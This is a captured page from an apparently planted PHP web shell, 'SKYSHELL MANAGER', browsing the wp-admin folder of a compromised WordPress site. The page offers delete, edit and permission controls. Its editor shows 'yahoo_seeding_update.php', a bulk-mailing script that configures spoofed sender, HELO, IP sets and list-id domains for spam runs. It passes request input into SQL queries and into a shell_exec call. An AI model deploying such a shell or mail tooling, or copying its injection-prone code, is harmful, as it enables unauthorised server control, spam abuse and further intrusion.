📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: yahoo_seeding_update.php
<?php include_once "connect.php"; session_start(); $eid=$_REQUEST['eid']; $iparray=$_REQUEST['Array1']; $emailarray=$_REQUEST['Array2']; $mode=$_REQUEST['mode']; $from_name=$_REQUEST['from_name']; $from=mysql_escape_string($_REQUEST['from_name']); $subject=mysql_escape_string($_REQUEST['sub']); $fromalias=mysql_escape_string($_REQUEST['fromalias']); $fdomain=mysql_escape_string($_REQUEST['fdomain']); $bdomain=mysql_escape_string($_REQUEST['bdomain']); $replyto=mysql_escape_string($_REQUEST['replyto']); $helo=mysql_escape_string($_REQUEST['helo']); $mail_from=mysql_escape_string($_REQUEST['mfrom']); $testemail=mysql_escape_string($_REQUEST['textfield27']); $track_id=$_REQUEST['track_id']; $data_file=trim($_REQUEST['data_file']); $content_type=$_REQUEST['texttype']; $mtatype=$_REQUEST['mtatype']; $limit=$_REQUEST['limit']; $sleep=$_REQUEST['sleep']; $chooseHeader=$_REQUEST['ChooseHeader']; $ipset=$_REQUEST['set_dropdown']; $test_count=$_REQUEST['test_count']; $test_process=$_REQUEST['test_process']; $test_mode=$_REQUEST['test_mode']; $url_pattern=$_REQUEST['url_pattern']; $test_limit=$_REQUEST['test_limit']; $message_type=$_REQUEST['msg_type']; $listid_domain_cycle=$_REQUEST['listid_domain_cycle']; $listid_domains=explode("\n",$_REQUEST['listid_domains']); $listid_domains=implode(",",$listid_domains); $listid_flag=$_REQUEST['listid_flag']; $process_type=$_REQUEST['process_type']; $queue_limit=$_REQUEST['queue_limit']; $listid_process=$_REQUEST['listid_process']; $type_2=$_REQUEST['type_2']; $type_3=$_REQUEST['type_3']; $type_2_value=$_REQUEST['type_2_value']; $type_3_value=$_REQUEST['type_3_value']; $img_pattern=$_REQUEST['img_pattern']; $img_path=$_REQUEST['img_path']; $offer_img=$_REQUEST['offer_img']; $opt_img=$_REQUEST['opt_img']; $mail_mode=trim($_REQUEST['mail_mode']);# for mail test foreach($_REQUEST as $k=>$value) { if($k =='message' || $k =='hrd_msg' || $k =='mltp_msg' ||$k =='htm_msg' ||$k =='pln_msg' || $k =='header') { $value=base64_encode($value); } } if(empty($testemail)){$test_email=$emailarray;} else{ $test_email=explode(",",$testemail); } $value=trim(file_get_contents("$local_server/common_file.php?key=6&tid=$track_id")); list($isp,$account,$offer,$offerid,$stat_id)=explode("|",$value); if($content_type=='multipart') { $hrd_msg=$_REQUEST['hrd_msg']; $mltp_msg=$_REQUEST['mltp_msg']; $htm_msg=$_REQUEST['htm_msg']; $pln_msg=$_REQUEST['pln_msg']; $message=$hrd_msg."\r\n".$mltp_msg; $message=trim(preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", $message)); // To Remove Empty Line in headers $message=str_replace("{html_message}",$htm_msg,$message); $message=str_replace("{text_message}",$pln_msg,$message); $message=mysql_escape_string($message); $actual_header=mysql_escape_string($hrd_msg); $multipart=mysql_escape_string($mltp_msg); $html_message=mysql_escape_string($htm_msg); $plain_message=mysql_escape_string($pln_msg); $disp_msg="<tr><td>Header</td><td><pre>$hrd_msg</pre></td></tr> <tr><td>Multipart</td><td><pre>$mltp_msg</pre></td></tr> <tr><td>Plain Message</td><td><pre>$htm_msg</pre></td></tr> <tr><td>Html Message</td><td><pre>$pln_msg</pre></td></tr>"; } else { $message=$_REQUEST['message']; $header=$_REQUEST['header']; $header=trim(preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", $header)); // To Remove Empty Line in headers $message=$header."\r\n".$message; $message=mysql_escape_string($message); $actual_header=mysql_escape_string($_REQUEST['header']); $html_message=mysql_escape_string($_REQUEST['message']); $disp_msg="<tr><td>Header</td><td><pre>".$_REQUEST['header']."</pre></td></tr> <tr><td>Html Message</td><td><pre style='height:250px;overflow-y:auto;'>".$_REQUEST['message']."</pre></td></tr>"; } foreach($iparray as $v) { $ips.="<p>$v</p>"; } foreach($test_email as $v) { $mailcontent.="<p>$v</p>"; } if(empty($iparray) || empty($test_email)) { echo "<blink> WARNING : You haven't selected IPs or Test Mails... </blink>"; exit; } $wc=shell_exec("wc -l /var/www/wxsource/$data_file"); if(empty($wc) || $wc==0 ) { echo "<blink> WARNING : You haven't mentioned Data file or Your Data file is Empty... </blink>"; exit; } $iparray=implode(",",$iparray); $test_email=implode(",",$test_email); $row=select1("select process_id from wmail.mprocess where emp_id='$eid' order by process_id desc limit 1"); $process_id=$row['process_id']; if(empty($process_id)) { echo "<blink> WARNING : Process id is empty... </blink>"; exit; }else { $res=mysql_query("update wmail.mprocess set isp ='$isp' ,mode='$mode',iparray='$iparray',emailarray='$test_email',subject_line='$subject',from_line='$from',from_domain='$fdomain',reply_to='$replyto',body_domain='$bdomain',mail_from='$mail_from',track_id='$track_id',mta_type='$mtatype',helo='$helo',header='$chooseHeader',creative='$message',file_name='$data_file',maillimit='$limit',sleep='$sleep',u_date=now(),actual_header='$actual_header',multipart='$multipart',plain_message='$plain_message',html_message='$html_message',ipset='$ipset',content_type='$content_type',test_count='$test_count',test_process='$test_process',test_mode='$test_mode',offername='$offer',offer_id='$offerid',accounts='$account',stat_id='$stat_id',ipflag='2',test_mode_limit='test_limit',url_pattern='$url_pattern',message_type='$message_type',listid_domains='$listid_domains',listid_domain_cycle='$listid_domain_cycle',listid_flag='$listid_flag',process_type='$process_type',queue_limit='$queue_limit',listid_process='$listid_process',type_2='$type_2',type_2_value='$type_2_value',type_3='$type_3',type_3_value='$type_3_value',img_pattern='$img_pattern',img_path='$img_path',offer_img='$offer_img',opt_img='$opt_img' where process_id='$process_id' ",$link1); if($res==TRUE ) { echo "<p id='pres'>Process Updated successfully. <b>PID : $process_id</b></p>"; } else { echo "<p style='color:brown;'>Process Updation failed. ".mysql_errno($link1) . ": " . mysql_error($link1) . ".</p>"; } } ?>
Save